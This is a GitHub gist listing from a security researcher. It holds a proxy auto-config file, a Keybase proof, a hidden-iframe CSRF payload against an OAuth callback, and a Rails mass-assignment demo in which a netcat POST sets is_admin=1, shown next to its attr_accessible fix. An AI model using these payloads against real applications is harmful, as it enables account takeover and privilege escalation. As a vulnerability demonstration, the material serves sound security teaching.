Michiel Prins michiel3

@michiel3
michiel3 / h1.pac
Last active Aug 30, 2018 — forked from RSO/h1.pac
View h1.pac
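function FindProxyForURL(url, host) {
  // Hosts that are routed through the local SOCKS proxy.
  var site_list = [
    "localhost",
    "127.0.0.1",
    "ci.inverselink.com",
    "payments-production.inverselink.com"
  ];
  if (site_list.includes(host)) {
    return "SOCKS5 127.0.0.1:8888";
  }
  // The gist preview is cut off above; a direct connection for every other host is assumed here.
  return "DIRECT";
}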
View keybase.md

Keybase proof

I hereby claim:

  • I am michiel3 on github.
  • I am michiel (https://keybase.io/michiel) on keybase.
  • I have a public key whose fingerprint is 7CAA CE4D A70C 4C8A FE94 A75C 9F46 3C34 FAA0 2F3D

To claim this, I am signing this object:

@michiel3
michiel3 / csrf-oauth.html
Created Jul 5, 2012
CSRF OAuth vulnerability
View csrf-oauth.html
<iframe src="https://vulnerableapp.com/auth/facebook?code=dGhpcyBpcyBub3QgbXkgcGFzc3dvcmQh..."
style="display:none;"></iframe>
@michiel3
michiel3 / massassignmentenabled.rb
Created Mar 6, 2012
Mass assignment protection enabled
View massassignmentenabled.rb
1.8.7-p352 :022 > User.create(:username => "michiel", :password => "password", :email => "info@online24.nl", :is_admin => 1)
ActiveModel::MassAssignmentSecurity::Error: Can't mass-assign protected attributes: is_admin
@michiel3
michiel3 / is_admin
Created Mar 6, 2012
Create user object with is_admin=1
View is_admin
root@pentest:~# nc -v localhost 3000
Connection to localhost 3000 port [tcp/hbci] succeeded!
POST /users HTTP/1.1
Host: localhost
Content-Length: 93

user[username]=michiel&user[password]=password&user[email]=info@online24.nl&user[is_admin]=1
@michiel3
michiel3 / create_user
Created Mar 6, 2012
Create user object
View create_user
root@pentest:~# nc -v localhost 3000
Connection to localhost 3000 port [tcp/hbci] succeeded!
POST /users HTTP/1.1
Host: localhost
Content-Length: 76

user[username]=michiel&user[password]=password&user[email]=info@online24.nl
@michiel3
michiel3 / scheme.rb
Created Mar 6, 2012
Mass assignment example scheme
View scheme.rb
ActiveRecord::Schema.define(:version => 20120306115211) do
  create_table "users", :force => true do |t|
    t.string "username"
    t.string "password"
    t.string "email"
    t.boolean "is_admin"
  end
end
@michiel3
michiel3 / user.rb
Created Mar 6, 2012
Mass assignment protection
View user.rb
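class User < ActiveRecord::Base
  # Only these attributes may be set through mass assignment.
  # is_admin is left off the whitelist, so user[is_admin]=1 is rejected.
  attr_accessible :username, :password, :email
end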